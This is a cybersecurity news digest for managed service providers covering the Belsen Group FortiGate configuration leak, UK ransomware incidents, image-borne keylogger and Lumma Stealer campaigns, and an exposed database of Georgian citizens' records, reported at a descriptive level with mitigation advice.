MSP cybersecurity news digest, January 29, 2025

15,000+ FortiGate firewall configurations leaked by Belsen Group

A new leak from the threat actor group Belsen Group has exposed over 15,000 FortiGate firewall configurations. The data has been released for free on the attackers’ Tor website, allowing other threat actors to exploit it.

The data consists of a 1.6GB archive categorized by country and IP address, includes configuration dumps, firewall rules, private keys, and VPN passwords, some stored in plain text.  Countries most impacted include the U.S., U.K., Poland and Belgium, followed by France, Spain, Malaysia, the Netherlands, Thailand and Saudi Arabia.

The Belsen Group claims the leaked data was collected in 2022 using a zero-day vulnerability, CVE-2022–40684, which was exploited to steal device configurations and add rogue administrative accounts. Even if organizations patched the vulnerability from 2022, attackers may have already gained access before mitigation efforts. Breached digital certificates could enable unauthorized access or impersonation during secure communications. To mitigate risks, organizations should update credentials, audit firewall configurations, rotate compromised certificates and monitor networks for suspicious activity.

Two recent ransomware attacks in the U.K.

ransomware attack forced Blacon High School in Chester, U.K., to shut down for at least two days, disrupting operations and leaving IT systems offline. While students continued coursework via Google Classroom, the school remained uncertain about potential data breaches, awaiting findings from cybersecurity specialists.

In a separate case, Gateshead Council in North East England was hit by the Medusa ransomware gang, which leaked 31 pages of stolen documents, exposing residents' and employees' personally identifiable information (PII). Medusa demanded $600,000 for data deletion.

The U.K. government is now considering a ban on ransom payments for public sector organizations and potentially extending restrictions to large private businesses.

In phishing campaigns, attackers are deploying VIP Keylogger and Obj3ctivity Stealer malware in images

Threat actors have been adding malicious code in images to deliver malware like VIP Keylogger and 0bj3ctivity Stealer through phishing campaigns.

Attackers uploaded these images to archive[.]org and used a .NET loader to install the final payloads. Victims were tricked into opening malicious Excel attachments that exploited a known vulnerability (CVE-2017-11882) to execute a VBScript, which then retrieved and decoded the malware. VIP Keylogger, deployed via this method, captures keystrokes, clipboard data, screenshots and credentials, sharing features with Snake Keylogger and 404 Keylogger.

Another campaign delivers malicious archive files via email, enticing victims to execute a JavaScript file that triggers a similar infection chain, ultimately installing 0bj3ctivity Stealer. The similarities suggest that cybercriminals are leveraging premade malware kits to streamline attacks and reduce the technical expertise required.

Lumma Stealer malware spread through fake CAPTCHA campaign targeting numerous industries

Researchers have uncovered a new malware campaign using fake CAPTCHA verification checks to spread the Lumma information stealer.  The campaign is global, affecting victims in Argentina, Colombia, the U.S., the Philippines and other countries, with the telecom industry being the most targeted.

Attackers lure victims to compromised websites that display a fake CAPTCHA, instructing them to run a command that downloads and executes an HTA file via Windows' mshta.exe. This HTA file triggers a multistage PowerShell script designed to bypass Windows Antimalware Scan Interface (AMSI) and deploy Lumma. By using this method, attackers evade browser-based defenses, making detection and blocking more difficult.

Lumma Stealer, a malware-as-a-service (MaaS) threat, has been actively distributed through various tactics, including nearly 1,000 fake domains mimicking Reddit and WeTransfer. Threat actors previously used a similar strategy with over 1,300 fake AnyDesk domains to spread Vidar Stealer malware. This discovery coincides with the emergence of an updated phishing-as-a-service (PhaaS) toolkit, Tycoon 2FA, which employs advanced evasion techniques to bypass security checks.

German cloud provider has exposed the sensitive data of the entire population of the country of Georgia

A German cloud service provider unintentionally exposed sensitive data, potentially affecting the entire population of Georgia, according to researchers.

The researchers traced the leak to an unprotected Elasticsearch instance hosted on a German cloud server, which was taken offline shortly after discovery. However, it remains unclear whether the company was notified, if threat actors accessed the data, or if it was exfiltrated elsewhere.

The exposed database contained millions of records, including personal details such as ID numbers, full names, birth dates, phone numbers and potentially insurance-related information. Some of the leaked data appears to be linked to a 2020 breach but was combined with additional records, including phone numbers and car owner details.